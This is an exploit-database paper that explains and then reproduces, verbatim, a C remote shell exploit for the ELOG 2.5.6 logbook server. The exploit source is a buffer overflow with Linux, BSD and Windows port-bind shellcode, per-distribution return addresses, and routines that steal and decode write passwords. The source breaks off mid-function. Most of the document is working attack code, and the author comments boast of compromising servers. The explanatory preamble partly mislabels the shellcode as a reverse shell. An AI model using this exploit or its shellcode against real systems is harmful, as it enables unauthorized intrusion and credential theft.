By exploitdb papers bot•February 9, 2005•
papers
ELOG 2.5.6 Remote Shell Exploit: A Deep Dive
ELOG 2.5.6 Remote Shell Exploit: A Deep Dive
What this paper is
This paper details a remote command execution vulnerability in ELOG (a web-based logbook system) version 2.5.6 and potentially earlier/later versions. The exploit allows an attacker to gain a remote shell on the target server. A key feature highlighted is the ability to steal and decode the "write password" for logbooks, enabling unauthorized modifications and further exploitation.
Simple technical breakdown
The exploit works by sending a specially crafted HTTP request to the ELOG daemon. This request targets a buffer overflow vulnerability. By overflowing a buffer with carefully chosen data, the attacker can overwrite critical memory, including the return address on the stack. This allows the attacker to redirect program execution to their own malicious code (shellcode) embedded within the exploit request. This shellcode then establishes a reverse shell connection back to the attacker, giving them command-line access to the compromised server. The exploit also includes functionality to discover and bypass the "write password" protection for logbooks.
Complete code and payload walkthrough
The provided C code implements the exploit. Let's break down its significant parts:
1. Includes and Definitions:
- Includes: Standard C libraries for networking (
sys/socket.h,netinet/in.h,netdb.h,arpa/inet.h), input/output (stdio.h,stdlib.h), string manipulation (string.h,strings.h), system calls (sys/types.h,unistd.h,sys/stat.h,fcntl.h), character handling (ctype.h), time (time.h), and error handling (errno.h,err.h). _GNU_SOURCE: Enables GNU extensions forstdio.h.- Constants: Numerous
#definedirectives set up buffer sizes, ports, timeouts, HTTP request components, test credentials, and shellcode definitions.CONTSIZE,BOUNSIZE,REQUESTSIZE,INBUF,LINEBUFSIZ,GETBUFSIZE,SENDBUFSIZE,BIGBUFSIZE,SHBUFSIZE: Define various buffer sizes for different parts of the HTTP request and data handling.ELOGPORT: Default port for ELOG (8080).BACKDOOR,BSDBACKDOOR,WINBACKDOOR: Define ports for different operating system shellcode to listen on.NOP: No Operation instruction (0x90), often used for padding shellcode.RED,GREEN,DEFAULT: ANSI escape codes for colored output.CHECKELOG,HTTPVER,POSTREQ,GETREQ,GETREQCMD: HTTP request fragments.TESTUSER,TESTPASS_DECODED,ADDICTEDZ,EXPERIMENT: Test credentials and strings used in the exploit.LOGBOOKAUTHOR,LOGSUBJECT: Metadata strings.ATT_FILE,MSGCONTENT,MSGQUERY,MSGVER,MSGBOUNDARY,MSGSECTOR,READOPTION,PASSALERT,GETINGPASS,PASSSUCCESS,CLEARAREA,NODATA,PASSFAILED,DEMOLOGBOOK: Various informational and status messages printed by the exploit.VERSION_CHECKER,AUTHORIZED_DENY,SECTOR_CLEAR,INVALIDURL,ATTERR,ATTOPTERR,ATTERRTAG,ATTERRTAGLAST: Strings used for parsing server responses.ATTNOTFOUND,MAKINGATT,NOTELOG,REMDOWN,REMCRASHED,BIGOPTIONLIST,ASKEDPASS: Macros and functions for error reporting and status updates.ALLOCGLOB,ZEROGLOB,PRINTINFO,NPRINTINFO,LOGBOOKNOTFOUND,BADSELECT: Macros for memory allocation, zeroing, printing, and error handling.COMMAND,WINCMD: Strings containing commands to be executed by the shellcode.
2. Global Variables and Data Structures:
map: Base64 encoding lookup table.content,content_length: Buffer and size for HTTP request content.boundary: Random boundary string for multipart/form-data requests.encoded_url: Buffer for URL-encoded strings.globcount,debug,recount,id: Counters and flags.wpassbufdec,wpassbufenc: Buffers for decoded and encoded write passwords.userandpass,encuserandpass: User credentials.bigbuffer,shbuffer,fedorabuf,debianbuffer,windozebuf,windozetext: Various buffers for shellcode and data.glob1_atttoglob10_att: Arrays to store attribute names for logbook manipulation.glob1_opttoglob10_opt: Arrays to store option values for logbook manipulation.struct globalz MISSED[]: Structure to hold pointers to theglobX_attarrays and their associated IDs.struct globalz TRASH[]: Structure to hold pointers to theglobX_optarrays and their associated IDs.struct target TARGETZ[]: An array of structures, each defining a target operating system/distribution, a specific return address (ret) for the exploit, and an ID. This is crucial for tailoring the exploit to different environments. Theretvalues are memory addresses that the exploit aims to overwrite with the address of the shellcode.- Example:
{"Slackware 9.1", 0x08629588, 0}means for Slackware 9.1, the target return address is0x08629588.
- Example:
struct globalz MISSED[]: This structure seems to be used to manage theglobX_attarrays, likely for dynamically building parts of the exploit request.struct globalz TRASH[]: Similar toMISSED, this manages theglobX_optarrays.
3. Shellcode Definitions:
lnx_shellcode[]: Shellcode for Linux systems. It aims to bind a shell to port 31337.- Stage 1 (Socket Creation & Binding):
\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80: System callsocket(AF_INET, SOCK_STREAM, 0)to create a socket.\x31\xd2\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x66\xcd\x80: System callbind()to bind the socket to an address and port. The port is encoded within the shellcode (likely 31337).\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80: System calllisten()to start listening for incoming connections.\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80: System callaccept()to accept an incoming connection.\x93\x89\xd1\xb0\x3f\xcd\x80: System calldup2()to duplicate the accepted socket file descriptor to standard input, output, and error.\x41\x80\xf9\x03\x75\xf6: Loop to check if file descriptors are valid.\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80: System callexecve()to execute/bin/sh.\x90\x90...: NOP sled for padding.
- Stage 1 (Socket Creation & Binding):
bsd_shellcode[]: Shellcode for BSD systems, also aiming for a port bind shell.- Similar logic to Linux shellcode but uses BSD system call conventions. It binds to port 11520.
win_shellcode[]: Shellcode for Windows systems, targeting port 5555.- This shellcode is significantly longer and more complex, typical of Windows shellcode. It involves setting up socket structures, connecting, and then executing a shell. The exact sequence of WinAPI calls is embedded in the bytes.
4. Helper Functions:
banner(): Displays an ASCII art banner.usage(char *argv[]): Prints usage instructions.listos(): Lists the supported operating systems and their corresponding IDs.get_host_ip(char *hostname): Resolves a hostname to an IP address.cind(char c): Finds the index of a character in themaparray (for Base64 encoding).is_there_attribute(void): Checks if any attributes have been defined.alloc_all_globalz(): Allocates memory for the global attribute and option arrays.make_random_boundary(): Generates a random boundary string for multipart HTTP requests.urlencode(char *str): Encodes a string for use in a URL.base64_encode(char *s, char *d): Encodes a string using Base64.base64_decode(char *s, char *d): Decodes a Base64 string.make_http_content(int upload, char *logbook): Constructs the main HTTP request body, including form data and potentially file uploads.make_request_header(char *host, char *method, int content_length): Creates the HTTP request headers.get_server_version(char *hostname, unsigned short int port): Sends aHEADrequest to determine if the server is ELOG and to get its version.check_for_clear_sector(char *hostname, unsigned short int port, char *logbook, int stage): This is a crucial function that attempts to bypass write password protection. It iteratively tries to access logbooks and attributes, looking for specific responses that indicate a password is required or that the sector is clear.- It uses
POSTrequests with craftedcontentto submit data to ELOG. - It parses responses for
PASSALERT,ASKEDPASS, andSECTOR_CLEARto guide its actions. - If a password is required, it attempts to steal and decode it.
- It uses
spy_attr_options(char *hostname, unsigned short int port, char *logbook): This function is designed to discover attributes and their options within a logbook, particularly to find the "write password". It sendsGETrequests with?cmd=downloadand specific attribute names.make_spy_header(char *host, short port, char *user, char *pass): Creates an HTTPPOSTrequest header with basic authentication.crack_the_code(char *hostname, unsigned short port, char *logbook): This function orchestrates the process of finding the write password. It callsspy_attr_optionsandcheck_for_clear_sectorto try and obtain the password.authorize_user(char *user, char *pwd): Sets up theuserandpassandencuserandpassstrings, likely for basic authentication.build_att_buffer(int uniz, int id): Initializes the global attribute and option buffers based on the target OS and exploit configuration.re_check_sector(char *hostname, unsigned short port, char *logbook, int stage): Appears to be a recursive or iterative function for checking logbook sectors, possibly to find exploitable attributes.do_last_stage(char *hostname, short port, char *logbook): This function is the final stage of the exploit. It constructs the payload that includes the shellcode and sends it to the target. It determines the correct shellcode based on theid(target OS) and the return address fromTARGETZ.we_r_coming(char *hostname): This function is called after a successful exploit to establish the shell connection. It creates a socket and connects to the attacker's machine (or a listener) to provide the shell.shell(int sock): This function takes a socket descriptor and spawns a shell (/bin/sh) that is connected to that socket, effectively giving the attacker a remote shell.
5. main Function:
- Parses command-line arguments:
-h: Hostname of the target.-p: Port of the ELOG daemon (default 8080).-l: Logbook name to target (default "demo").-o: Target OS/architecture ID (determines the return address and shellcode).-d: List supported OSs.-u: Username for basic authentication.-r: Password for basic authentication.-w: Pre-defined write password (if known).
- Initializes global variables and data structures.
- Calls
alloc_all_globalz()to prepare attribute buffers. - Calls
build_att_buffer()to set up exploit-specific attributes. - Calls
authorize_user()to set credentials. - Calls
get_server_version()to check if the target is ELOG. - Calls
check_for_clear_sector()to initiate the exploitation process, which will eventually lead to gaining a shell.
6. Shellcode Execution Flow (Conceptual):
- The
mainfunction prepares the exploit. - It determines the target OS and its corresponding return address from
TARGETZ. - It constructs a malicious HTTP request. This request contains:
- A buffer overflow payload designed to overwrite the return address on the stack.
- The address of the shellcode as the new return address.
- The actual shellcode itself, placed in a controllable memory location.
- The exploit sends this crafted request to the ELOG daemon.
- The ELOG daemon processes the request, triggering the buffer overflow.
- The program execution jumps to the shellcode.
- The shellcode executes, establishing a network connection (e.g., a bind shell or reverse shell) back to the attacker on a predefined port.
- The
shell()function in the exploit code (or the shellcode itself) spawns/bin/shand pipes its input/output through the established network connection.
7. Write Password Stealing Mechanism:
- The exploit attempts to access logbooks and attributes.
- If a logbook is write-password protected, ELOG will typically return a specific HTML response indicating this.
- The exploit parses this response.
- It then uses a
GETrequest with?cmd=downloadand specific attribute names to try and retrieve the password. The password might be encoded (e.g., Base64) in the response. - The
base64_decodefunction is used to decode the stolen password. - This decoded password can then be used for subsequent authenticated requests or to bypass write protection.
Code Fragment -> Practical Purpose Mapping:
| Code Fragment/Block | Practical Purpose
Original Exploit-DB Content (Verbatim)
/* Worked on latest version for me
* http://midas.psi.ch/elog/download/tar/elog-latest.tar.gz
* elog-latest.tar.gz 26-Jan-2005 21:36 519K
* Default port 8080.
* str0ke */
/*
Hi there, someone has brought to u a gift.
ELOG Remote Shell Exploit <= 2.5.6 (Also for future Versions)
Updated On 18/April/2004
LOCK YOUR LOGBOOKZ, THERE IS A SPY IN THE WILD!
Bug: Sorry, we do not support fool-disclosure.
Characteristicz : Fully Automated Filling Mechanism ,steal/decode base_64 ELOG _write_ passwordz.
(breakin into write password protected servers,)
Targeting : objdump -t elogd | grep _mtext <----- your magic jumping addres.
change that value with one of the targets below .If The ret lookz like 0x09..
then that means elogd version is 2.5.5 or greater.If 0x8.. then < 2.5.5
NOte: The buffer-length in linux, varies from one distro to other, like the BSD one.
so do not add shit to the target area unless as well as u know what u r doing.
Tricks i : Some hosts using Elog daemon under Apache mod_proxy module,
so u'd better force a bit yourself port scan that host in order to get the elog port.
(Be warned , most of the serverz we owned had at least 2 running elog http servers.)
ii : If U can _not_ get the write pazzword for logbook, then try other logbooks.
(especially, happens when the background mode enabled).
iii : If u happen to meet logbook which has more than 10 attribute/optionz
then add more globalz to the global sectionz of this code,now it supportz
10 att/opt, i haven't seen more than this Yet!.
Challange: Find the other 2 heap and a 1 url traversal bugs in elogd.(Both exploitable)
Finally A big FUCK to the Sn2 for leaking this code to the public.
Unknown u.g Bl4ckh4t group member[3]
nrktx DIGITALLY SIGNATURED
_EOC_
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <ctype.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <errno.h>
#include <err.h>
#define _GNU_SOURCE
#define CONTSIZE 10000
#define BOUNSIZE 100
#define REQUESTSIZE 2000
#define INBUF 5000
#define LINEBUFSIZ 1000
#define GETBUFSIZE 10000
#define SENDBUFSIZE 10000
#define TIMEOUT 30
#define ENURLSIZE 200
#define GLOBATTSIZE 200
#define STORESIZE 10000
#define ELOGPORT 8080
#define SHBUFSIZE 288
#define BIGBUFSIZE 5000
#define BACKDOOR 31337
#define BSDBACKDOOR 11520
#define WINBACKDOOR 5555
#define NOP 0x90
#define RED "\033[31m"
#define GREEN "\033[32m"
#define DEFAULT "\033[0m"
#define CHECKELOG "HEAD HTTP/1.1"
#define HTTPVER " HTTP/1.1\r\n"
#define POSTREQ "POST /"
#define GETREQ "GET /"
#define GETREQCMD "?cmd=download"
#define TESTUSER "candy-n4rk0tix"
#define TESTPASS_DECODED "candy-blackhat"
#define ADDICTEDZ "candy:narkotix"
#define EXPERIMENT "iloveucandy"
#define LOGBOOKAUTHOR "CodeName : Candy-bl4ckh47"
#define LOGSUBJECT "Mission Impossible"
#define ATT_FILE "do-NOT-trust-me-biatch"
#define MSGCONTENT "Building Required HTML CONTENT"
#define MSGQUERY "Building Required HTML QUERY"
#define MSGVER "Asking For Version..."
#define MSGBOUNDARY "Building Random BOUNDARY.."
#define MSGSECTOR "Checking IF Sector Is CLEAR.."
#define READOPTION "Getting Required Attr Options BE PATIENT !"
#define PASSALERT "LogBook Is Write Password Protected"
#define GETINGPASS "Wait Bro We R Gonna Catch The Password"
#define PASSSUCCESS "WE GOT The Write Password Bro !!"
#define CLEARAREA "[SECTOR CLEAR.. FORCING OUR LUCK TO GET IN]"
#define NODATA "EOF"
#define PASSFAILED "Could not get password, Prolly Elogd started with -D arg !"
#define DEMOLOGBOOK "demo"
#define UPLOADME 1
#define NOTUPLOADME 0
#define VERSION_CHECKER "Server: ELOG HTTP "
#define AUTHORIZED_DENY "401 Authorization Required"
#define SECTOR_CLEAR "302 Found"
#define INVALIDURL "Invalid URL"
#define ATTERR "Error: Attribute "
#define ATTOPTERR "Error: Attribute option "
#define ATTERRTAG "<b>"
#define ATTERRTAGLAST "</b>"
#define ATTNOTFOUND(x) {fprintf(stderr,"[!] Attribute %s Notfound\n",x);}
#define MAKINGATT(x) {fprintf(stderr,""GREEN"[+]"DEFAULT" Attribute %s ADDING..\
\t"GREEN"DONE"DEFAULT"\n",x);}
#define NOTELOG "Remote Server Is NOT Elog !"
#define REMDOWN "Connection reset by Peer"
#define REMCRASHED "Server DEAD"
#define BIGOPTIONLIST "Too Many Attributes Dude,MODIFY THE CODE !"
#define ASKEDPASS "Please enter password to obtain write access"
#define ALLOCGLOB(x) {x = (char *)malloc(GLOBATTSIZE *sizeof(char));}
#define ZEROGLOB(x) { memset(x,'\0',GLOBATTSIZE);}
#define PRINTINFO(x,y) {if(y <= 1) printf(""GREEN"[+]"DEFAULT" %s\n",x);}
#define NPRINTINFO(x) {printf("[-] %s\n",x);}
#define LOGBOOKNOTFOUND(x,y) {bzero(x,sizeof(x));\
sprintf(x,"Error: logbook \"%s\" not defined",y);\
}
#define BADSELECT "option value=\"\">"
#define COMMAND "echo '---[WE NEVER BELIEVE IN LUCK]---'; uptime ; uname -a ; id;"\
"TERM=xterm; export TERM; who ; unset HISTFILE\n"
#define WINCMD "echo '----WE PWNED U DUDE---' & hostname\n "
char *map = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
char content[CONTSIZE];
static int content_length;
static unsigned char boundary[BOUNSIZE];
char encoded_url[ENURLSIZE];
static int globcount = 0;
static int debug = 1;
static int recount = 0;
int id = 0;
char wpassbufdec[50] = {'\0'};
char wpassbufenc[50] = {'\0'};
char userandpass[50] = ADDICTEDZ;
char encuserandpass[50] = ADDICTEDZ;
char bigbuffer[BIGBUFSIZE];
char shbuffer [288];
char fedorabuf [288];
char debianbuffer [264];
char windozebuf [246];
char windozetext [600];
static unsigned char glob1_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob2_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob3_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob4_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob5_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob6_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob7_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob8_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob9_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob10_att[GLOBATTSIZE] = {'\0'};
static unsigned char glob1_opt[GLOBATTSIZE] = "Other";
static unsigned char glob2_opt[GLOBATTSIZE] = "Other";
static unsigned char glob3_opt[GLOBATTSIZE] = "Other";
static unsigned char glob4_opt[GLOBATTSIZE] = "Other";
static unsigned char glob5_opt[GLOBATTSIZE] = "Other";
static unsigned char glob6_opt[GLOBATTSIZE] = "Other";
static unsigned char glob7_opt[GLOBATTSIZE] = "Other";
static unsigned char glob8_opt[GLOBATTSIZE] = "Other";
static unsigned char glob9_opt[GLOBATTSIZE] = "Other";
static unsigned char glob10_opt[GLOBATTSIZE] = "Other";
struct globalz
{
char *addr;
int id;
};
struct target
{
char *distro;
long ret;
int id;
};
struct target TARGETZ[] =
{
{"Slackware 9.1" , 0x08629588 , 0},
{"Gentoo 3.3.5-r1 " , 0x09093f40 , 1}, /* 0x08624572 for Gentoo 3.3.2 */
{"FreeBSD 4.9 STABLE " , 0x0906aa24 , 2},
{"Mandrake 10.1" , 0x085dd70a , 3},
{"Fedora Core 1" , 0x08624600 , 4}, /* Fedora sux, Inferno Rulez*/
{"Debian 3.0 " , 0x085e0420 , 5}, /* 2.5.6-1 - 0x090853e0 /str0ke */
{"WinXP SP2 Elog-2.5.6", 0x0055D9F0 , 6}, /* Fuck that NULL byte, it is innocent */
{"Redhat 7.3 " , 0x85dd3c0 , 7},
{"Redhat E.L " , 0x090653a0 , 8},
{"Slackware 10 " , 0x09064c80 , 9},
{"FreeBSD 5.2 " , 0x090673c0 , 10},
{"FreeBSD 5.3 STABLE" , 0x090658e0 , 11},
{"NULL " , 0x0 , -1},
};
struct globalz MISSED[]=
{
{(char *)&glob1_att, 0},
{(char *)&glob2_att, 0},
{(char *)&glob3_att, 0},
{(char *)&glob4_att, 0},
{(char *)&glob5_att, 0},
{(char *)&glob6_att, 0},
{(char *)&glob7_att, 0},
{(char *)&glob8_att, 0},
{(char *)&glob9_att, 0},
{(char *)&glob10_att, 0},
{ NULL , 0},
};
struct globalz TRASH[]=
{
{(char *)&glob1_opt, 0},
{(char *)&glob2_opt, 0},
{(char *)&glob3_opt, 0},
{(char *)&glob4_opt, 0},
{(char *)&glob5_opt, 0},
{(char *)&glob6_opt, 0},
{(char *)&glob7_opt, 0},
{(char *)&glob8_opt, 0},
{(char *)&glob9_opt, 0},
{(char *)&glob10_opt, 0},
{NULL , 0}
};
/*linux portbind 31337*/
char lnx_shellcode[] =
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1"
"\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x7a\x69"
"\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1"
"\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43"
"\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0"
"\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1"
"\xb0\x0b\xcd\x80\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90";
/*BSD portbind */
char bsd_shellcode[] =
"\x31\xc0\x99\x52\x42\x52\x42\x52\x50\xb0\x61"
"\xcd\x80\x6a\x2d\x66\x52\x89\xe3\x6a\x10\x53"
"\x50\x50\xb0\x68\xcd\x80\x5b\x50\x53\x50\xb0"
"\x6a\xcd\x80\xb0\x1e\xcd\x80\x52\x50\x52\xb0"
"\x5a\xcd\x80\x4a\x79\xf6\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x50\x54\x53\x53"
"\xb0\x3b\xcd\x80\x90\x90\x90\x90\x90\x90\x90";
/*Win2k portbind 5555*/
char win_shellcode[] =
"\x66\x81\xec\x04\x07"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31"
"\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x76\xac\x7c\x25\x81\xee\xfc"
"\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff\x9e\x94\x7c\x25"
"\x76\xef\x31\x61\x76\x4b\x05\xe3\x0f\x49\x35\xa3\x3f\x08\xd1\x0b"
"\x9f\x08\x66\x55\xb1\x75\x75\xd0\xdb\x67\x91\xd9\x4d\x22\x32\x2b"
"\x9a\xd2\xa4\xc7\x05\x01\xa5\x20\xb8\xde\x82\x96\x60\xfb\x2f\x17"
"\x29\x9f\x4e\x0b\x32\xe0\x30\x25\x77\xf7\x28\xac\x93\x25\x21\x25"
"\x1c\x9c\x25\x41\xfd\xad\xf7\x65\x7a\x27\x0c\x39\xdb\x27\x24\x2d"
"\x9d\xa0\xf1\x72\x5a\xfd\x2e\xda\xa6\x25\xbf\x7c\x9d\xbc\x16\x2d"
"\x28\xad\x92\x4f\x7c\xf5\xf7\x58\x76\x2c\x85\x23\x02\x48\x2d\x76"
"\x89\x98\xf3\xcd\xe6\xac\x7c\x25\x2f\x25\x78\xab\x94\x47\x4d\xda"
"\x10\x2d\x90\xb5\x77\xf8\x14\x24\x77\xac\x7c\xda\x23\x8c\x2b\x72"
"\x21\xfb\x3b\x72\x31\xfb\x83\x70\x6a\x25\xbf\x14\x89\xfb\x2b\x4d"
"\x74\xac\x69\x96\xff\x4a\x16\x35\x20\xff\x83\x70\x6e\xfb\x2f\xda"
"\x23\xb8\x2b\x73\x25\x53\x29\x35\xff\x6e\x1a\xa4\x9a\xf8\x7c\xa8"
"\x4a\x88\x4d\xe5\x1c\xb9\x25\xd6\xdd\x25\xab\xe3\x32\x88\x6c\x61"
"\x88\xe8\x58\x18\xff\xd0\x58\x6d\xff\xd0\x58\x69\xff\xd0\x58\x75"
"\xfb\xe8\x58\x35\x22\xfc\x2d\x74\x27\xed\x2d\x6c\x27\xfd\x83\x50"
"\x76\xfd\x83\x70\x46\x25\x9d\x4d\x89\x53\x83\xda\x89\x9d\x83\x70"
"\x5a\xfb\x83\x70\x7a\x53\x29\x0d\x25\xf9\x2a\x72\xfd\xc0\x58\x3d"
"\xfd\xe9\x40\xae\x22\xa9\x04\x24\x9c\x27\x36\x3d\xfd\xf6\x5c\x24"
"\x9d\x4f\x4e\x6c\xfd\x98\xf7\x24\x98\x9d\x83\xd9\x47\x6c\xd0\x1d"
"\x96\xd8\x7b\xe4\xb9\xa1\x7d\xe2\x9d\x5e\x47\x59\x52\xb8\x09\xc4"
"\xfd\xf6\x58\x24\x9d\xca\xf7\x29\x3d\x27\x26\x39\x77\x47\xf7\x21"
"\xfd\xad\x94\xce\x74\x9d\xbc\xac\x9c\xf3\x22\x78\x2d\x6e\x74\x25";
char *make_http_content(int , char*);
char *make_random_boundary (void);
char *make_request_header(char *,char *,int);
char *urlencode (char *);
void base64_encode (char *, char *);
void get_server_version(char *, unsigned short int);
void base64_decode (char *, char *);
void get_missing_attributes (char *, char *,char *);
void alloc_all_globalz (void);
void re_check_sector (char *,unsigned short,char *,int);
void spy_attr_options (char *,unsigned short int, char *);
void make_spy_header(char *,short, char *,char *);
void crack_the_code (char *,unsigned short, char *);
void authorize_user(char * , char *);
void build_att_buffer (int , int);
void do_last_stage ( char * ,short , char *);
void we_r_coming (char* );
void shell(int sock);
void banner(void);
void usage(char *);
void listos(void);
long get_host_ip (char *);
int cind (char c);
int is_there_attribute (void);
int check_for_clear_sector (char *,unsigned short int,char *,int);
int main (int argc , char *argv[])
{
int flg;
int port = ELOGPORT;
int uniz = 0;
char *logbook = DEMOLOGBOOK;
char *hostname = NULL;
char *u_name = TESTUSER;
char *u_pwd = TESTPASS_DECODED;
char *write_pazzword = NULL;
banner();
while((flg = getopt(argc,argv,"h:p:l:o:w:u:r:dD")) !=EOF)
{
switch(flg)
{
case 'h':
hostname = strdup(optarg);
break;
case 'p':
port = atoi(optarg);
break;
case 'l':
logbook = strdup(optarg);
break;
case 'o':
id = atoi(optarg);
if((id == 2) || (id == 10) || (id == 11)){
uniz++;
break;}
if(id == 6)
uniz = 2;
break;
case 'd':
listos();
exit(1);
case 'u':
u_name = strdup(optarg);
break;
case 'r':
u_pwd = strdup(optarg);
break;
case 'w':
write_pazzword = strdup(optarg);
strncpy(wpassbufdec,write_pazzword,49);
break;
default :
usage(argv[0]);
}
}
if(!hostname)
exit(1);
printf(""GREEN"[+]"DEFAULT" Exploiting on %s : 0x%lx\n",TARGETZ[id].distro,TARGETZ[id].ret);
alloc_all_globalz();
build_att_buffer(uniz,id);
authorize_user(u_name , u_pwd);
get_server_version(hostname,port);
check_for_clear_sector(hostname,port,logbook,0);
return(0);
}
void base64_encode(char *s, char *d)
{
unsigned int t, pad;
pad = 3 - strlen(s) % 3;
if (pad == 3)
pad = 0;
while (*s) {
t = (*s++) << 16;
if (*s)
t |= (*s++) << 8;
if (*s)
t |= (*s++) << 0;
*(d + 3) = map[t & 63];
t >>= 6;
*(d + 2) = map[t & 63];
t >>= 6;
*(d + 1) = map[t & 63];
t >>= 6;
*(d + 0) = map[t & 63];
d += 4;
}
*d = 0;
while (pad--)
*(--d) = '=';
}
void base64_decode(char *s, char *d)
{
unsigned int t;
while (*s) {
t = cind(*s) << 18;
s++;
t |= cind(*s) << 12;
s++;
t |= cind(*s) << 6;
s++;
t |= cind(*s) << 0;
s++;
*(d + 2) = (char) (t & 0xFF);
t >>= 8;
*(d + 1) = (char) (t & 0xFF);
t >>= 8;
*d = (char) (t & 0xFF);
d += 3;
}
*d = 0;
}
int cind(char c)
{
int i;
if (c == '=')
return 0;
for (i = 0; i < 64; i++)
if (map[i] == c)
return i;
return -1;
}
void get_server_version(char *hostname,unsigned short port)
{
const unsigned char *version_chec = VERSION_CHECKER;
const unsigned char *version_request = CHECKELOG;
int yes = 1;
int get_total = 0;
int send_total = 0;
char info_buf[INBUF];
int sock_req;
int ready;
struct sockaddr_in rem_addr;
fd_set read_fd;
struct timeval w_t;
w_t.tv_sec = TIMEOUT;
w_t.tv_usec = 0;
PRINTINFO(MSGVER,1);
sock_req = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(sock_req < 0) {
perror("socket");
exit(EXIT_FAILURE);
}
if(setsockopt(sock_req,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(int)) == -1)
{ perror("setsockopt");
exit(1);
}
memset(&(rem_addr.sin_zero),'\0',8);
rem_addr.sin_family = AF_INET;
rem_addr.sin_port = htons(port);
rem_addr.sin_addr.s_addr = get_host_ip(hostname);
if( connect(sock_req,(struct sockaddr *)&rem_addr,sizeof(struct sockaddr)) == -1)
{
err(1,NULL);
exit(1);
}
FD_ZERO(&read_fd);
FD_SET(sock_req,&read_fd);
if ((send_total = send(sock_req,version_request,strlen(version_request),0)) == -1)
{
perror("send");
exit(1);
}
if((ready = select(sock_req+1,&read_fd,(fd_set *)NULL,(fd_set *)NULL,&w_t)) < 0){
perror("select");
exit(1);
}
if(FD_ISSET(sock_req,&read_fd))
{
if( (get_total = recv(sock_req,info_buf,sizeof(info_buf)-1,0)) == -1)
{
perror("recv");
exit(1);
}
else if(get_total <= 0){
fprintf(stderr,"[-]Can not receive information\n");
exit(1);
}
info_buf[get_total] = '\0';
int i;
char linebuf[LINEBUFSIZ];
char lastbuf[LINEBUFSIZ];
bzero(linebuf,sizeof(linebuf));
bzero(lastbuf,sizeof(lastbuf));
char *p = (char *)&linebuf[0];
char *k = (char *)&lastbuf[0];
char *z;
if((z = strstr(info_buf,version_chec)) != NULL)
{
strncpy(p,z,500);
for(i = 0; (*p != '-') && (*p != '\n'); i++){
*k++ = *p++;
}
PRINTINFO(lastbuf,debug);
close(sock_req);
return;
}
}
NPRINTINFO(NOTELOG);
close(sock_req);
exit(1);
}
char *make_random_boundary(void)
{
PRINTINFO(MSGBOUNDARY,debug);
char bound_buf[BOUNSIZE];
char *p;
p = bound_buf;
srand((unsigned) time(NULL));
bzero(bound_buf,sizeof(bound_buf));
sprintf(bound_buf,"---------------------------%04X%04X%04X",rand(),rand(),rand());
return(p);
}
char *make_http_content(int choice,char *logbookname)
{
char *pazzword = TESTPASS_DECODED;
char passencode[50];
char *text = NULL;
const char *experiment = logbookname;
const char *att_file = shbuffer;
const char *testuser = TESTUSER;
const char *subject = LOGSUBJECT;
char *l_content = content;
int include_evilfile = 0;
int attrcount = 0;
int j;
if(choice == UPLOADME)
include_evilfile = 1;
else if (choice == NOTUPLOADME)
include_evilfile = 0;
if(id == 4)
att_file = fedorabuf;
if((id == 5) || (id == 2))
att_file = debianbuffer;
if(id == 6){
att_file = windozebuf;
text = windozetext;
}
if(id != 6)
text = bigbuffer;
sprintf(boundary,"%s",make_random_boundary());
PRINTINFO(MSGCONTENT,debug);
base64_encode(pazzword,passencode);
strcpy(content,boundary);
strcat(content, "\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nSubmit\r\n");
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"wpwd\"\r\n\r\n%s\r\n",boundary,wpassbufenc);
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"unm\"\r\n\r\n%s\r\n",boundary,testuser);
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"upwd\"\r\n\r\n%s\r\n", boundary, passencode);
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"exp\"\r\n\r\n%s\r\n", boundary, experiment);
if((attrcount = is_there_attribute())) {
for( j = 0; j < attrcount ; j++) {
sprintf(content + strlen(content),
"%s\r\nContent-Disposition: form-data; name=\"%s\"\r\n\r\n%s\r\n",
boundary,MISSED[j].addr,TRASH[j].addr);
}
}
sprintf(content + strlen(content),
